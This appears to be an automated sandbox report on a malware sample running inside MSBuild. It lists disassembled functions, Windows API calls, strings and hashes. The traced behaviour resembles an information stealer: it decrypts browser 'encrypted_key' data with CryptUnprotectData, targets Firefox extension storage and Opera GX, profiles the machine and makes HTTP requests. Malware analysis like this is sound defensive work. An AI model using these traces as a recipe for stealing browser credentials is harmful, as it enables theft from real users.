                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3466090806-0
                                                                                        • Opcode ID: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
                                                                                        • Instruction ID: d8ad9fbc0ebf95024768528cc8c117c10f0d608e1468c19e6a8aac0af7a2ce34
                                                                                        • Opcode Fuzzy Hash: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
                                                                                        • Instruction Fuzzy Hash: 31F049B5600208BFE710ABA0EC49EAB7BBDEB48755F002158FA05E6280D6B099008BE0
                                                                                        APIs
                                                                                        • GetEnvironmentVariableA.KERNEL32(0168EF58,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,0040B90C,016996B0), ref: 00406FE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • SetEnvironmentVariableA.KERNEL32(0168EF58,00000000,00000000,?,00423404,?,0040B90C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004201E9), ref: 0040704F
                                                                                        • LoadLibraryA.KERNEL32(01699F88,?,?,?,?,?,?,?,0040B90C,016996B0), ref: 00407064
                                                                                        Strings
                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406FE0, 00406FF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                        • API String ID: 2929475105-3463377506
                                                                                        • Opcode ID: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
                                                                                        • Instruction ID: 3674f494c0927660592f126ebe4d752a07d6e352543a463b58e450960cf84051
                                                                                        • Opcode Fuzzy Hash: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
                                                                                        • Instruction Fuzzy Hash: 0041A471A049049FC724FFE5EC45AAA33BAEB44304F04953EE401672E1DFB8690ACF96
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                        • String ID: =OA
                                                                                        • API String ID: 4198075804-2781383965
                                                                                        • Opcode ID: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
                                                                                        • Instruction ID: c815e327a45929293fb115344fed98bb65589d785c8a70cda2a6ba11b763288e
                                                                                        • Opcode Fuzzy Hash: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
                                                                                        • Instruction Fuzzy Hash: D6416E729102089BDB24FFA1DC42BED7779AF54304F54903EF902765D2DB386A49CBA8
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00412B26,?), ref: 004112A0
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00412B26,?), ref: 004112CB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00412B26,?), ref: 004112D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                        • String ID: &+A
                                                                                        • API String ID: 1065093856-3022679855
                                                                                        • Opcode ID: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
                                                                                        • Instruction ID: e3584a1bd73763bab08ea096363b5fafa1b3dc09f005f439864d535dca2b5911
                                                                                        • Opcode Fuzzy Hash: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
                                                                                        • Instruction Fuzzy Hash: 6FF08C316402187ADA20EF61EC07FEA376CDB01760F00526AFA09A65D0DBB06D4586E8
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00423544,004201E9), ref: 0040B224
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B240
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                        • API String ID: 161838763-3310892237
                                                                                        • Opcode ID: 5b06250b52101bc78d6f4f105a3c9b98acbab95c31c3b8f2825379732b3d5802
                                                                                        • Instruction ID: bbf64b21a70ba96c4e7d34df4571fb99f0a9ed04e141873abf1496de80f97976
                                                                                        • Opcode Fuzzy Hash: 5b06250b52101bc78d6f4f105a3c9b98acbab95c31c3b8f2825379732b3d5802
                                                                                        • Instruction Fuzzy Hash: B951FD729101186BDB24FB71DD529ED7378AF54704F44813EF806729D2EF386A0CCAA9
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00413120
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004131CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 1659193697-2861137601
                                                                                        • Opcode ID: 0be82df5096fbdc7b645b95910ef4257ac8856a976d54f11a5ce5c5baab4e6dd
                                                                                        • Instruction ID: fa0f609c73550b9905e9a4c97c517d243e9d7e9da07ba45fb7ad886b791ba49f
                                                                                        • Opcode Fuzzy Hash: 0be82df5096fbdc7b645b95910ef4257ac8856a976d54f11a5ce5c5baab4e6dd
                                                                                        • Instruction Fuzzy Hash: 03315072A00204ABCB10FF65D846BDE7B78EB44754F10813EF915A76C1DB38A649CBD9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,?,?,0040EC99,?), ref: 0040BE7D
                                                                                          • Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406CF7
                                                                                          • Part of subcall function 00406CD0: LocalAlloc.KERNEL32(00000040,00000000,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D06
                                                                                          • Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406D1D
                                                                                          • Part of subcall function 00406CD0: LocalFree.KERNEL32(?,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D2C
                                                                                          • Part of subcall function 00406D50: CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
                                                                                          • Part of subcall function 00406D50: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
                                                                                          • Part of subcall function 00406D50: LocalFree.KERNEL32(?), ref: 00406DAE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                        • String ID: $"encrypted_key":"
                                                                                        • API String ID: 2311102621-1472317035
                                                                                        • Opcode ID: adf510e862ffaae0eac30d3710188e28c4ead385b1d1c5076cab659ba97375c8
                                                                                        • Instruction ID: a7abf6cd44106865342de8c1123d42a84d3c3a1b941403826e444eadc47bdcfc
                                                                                        • Opcode Fuzzy Hash: adf510e862ffaae0eac30d3710188e28c4ead385b1d1c5076cab659ba97375c8
                                                                                        • Instruction Fuzzy Hash: E52184B6A101096BDB14EBB5DC41AEF777DDB40304F44417AF901B32D6EB38DA448AE8
                                                                                        APIs
                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C563095
                                                                                          • Part of subcall function 6C5635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
                                                                                          • Part of subcall function 6C5635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
                                                                                          • Part of subcall function 6C5635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
                                                                                          • Part of subcall function 6C5635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
                                                                                          • Part of subcall function 6C5635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
                                                                                          • Part of subcall function 6C5635A0: __aulldiv.LIBCMT ref: 6C5636E4
                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C56309F
                                                                                          • Part of subcall function 6C585B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5856EE,?,00000001), ref: 6C585B85
                                                                                          • Part of subcall function 6C585B50: EnterCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585B90
                                                                                          • Part of subcall function 6C585B50: LeaveCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585BD8
                                                                                          • Part of subcall function 6C585B50: GetTickCount64.KERNEL32 ref: 6C585BE4
                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5630BE
                                                                                          • Part of subcall function 6C5630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C563127
                                                                                          • Part of subcall function 6C5630F0: __aulldiv.LIBCMT ref: 6C563140
                                                                                          • Part of subcall function 6C59AB2A: __onexit.LIBCMT ref: 6C59AB30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2382937491.000000006C560000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000004.00000002.2383594395.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000004.00000002.2383635275.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                        • String ID:
                                                                                        • API String ID: 4291168024-0
                                                                                        • Opcode ID: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
                                                                                        • Instruction ID: 6af683cd2b3b865d7b5aba0b84225e65bb5a36e6504f94e68832e90846dae1ab
                                                                                        • Opcode Fuzzy Hash: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
                                                                                        • Instruction Fuzzy Hash: 18F0F932E20744D7CB50DF749C412EA7370AFEF214F521719E88563621FF2066D8838A
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004110C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3183270410-0
                                                                                        • Opcode ID: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
                                                                                        • Instruction ID: 1c08e919c02a254b4b37d860c04ab18dc4e81f8fecafc94af7ba70b0d8b08a1d
                                                                                        • Opcode Fuzzy Hash: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
                                                                                        • Instruction Fuzzy Hash: 56F06576A016286BDB20AB589C46FDE776CEF04B14F005195FF08A7290DBB46D848BD9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,004201E9,004201E9,?), ref: 0040D037
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                        • String ID: Opera GX
                                                                                        • API String ID: 1719890681-3280151751
                                                                                        • Opcode ID: f0d4e103f7de1d8a2f0e4d41ef56a32c1f57d9139897f8cc104fe8fe2fb9924c
                                                                                        • Instruction ID: 878ea3d55aa325650e3ef9eb940674a8195e6d8f65bb4788ec79313c0214d067
                                                                                        • Opcode Fuzzy Hash: f0d4e103f7de1d8a2f0e4d41ef56a32c1f57d9139897f8cc104fe8fe2fb9924c
                                                                                        • Instruction Fuzzy Hash: 2AD11F72910108ABCB14FBA1D952DEE7778AF54304F50813EF806765D2EB38AA0CCAA5
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                          • Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                          • Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                          • Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                          • Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                          • Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 3287882509-2861137601
                                                                                        • Opcode ID: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
                                                                                        • Instruction ID: b53bf029f71d461a7cd9a980bfe8ed76a20664019d00161f83185fc2695e4cb7
                                                                                        • Opcode Fuzzy Hash: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
                                                                                        • Instruction Fuzzy Hash: 3211303261010867CB24FF72E8529DD3768AE10708F40817EF805779D2EF386A0DCAD9
                                                                                        APIs
                                                                                        • GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProfilelstrcpy
                                                                                        • String ID: Unknown
                                                                                        • API String ID: 2831436455-1654365787
                                                                                        • Opcode ID: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
                                                                                        • Instruction ID: 19cb3bbfcee307e431a48a4cc2986d0f4610495d139a97f2bc99e78c6af915a2
                                                                                        • Opcode Fuzzy Hash: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
                                                                                        • Instruction Fuzzy Hash: B8E08033F04128534A207BA87C018DE776CDB44755710427FFD05D7241DB69995547D9
                                                                                        APIs
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004161D7
                                                                                        • lstrcatA.KERNEL32(?,01699C28), ref: 004161F2
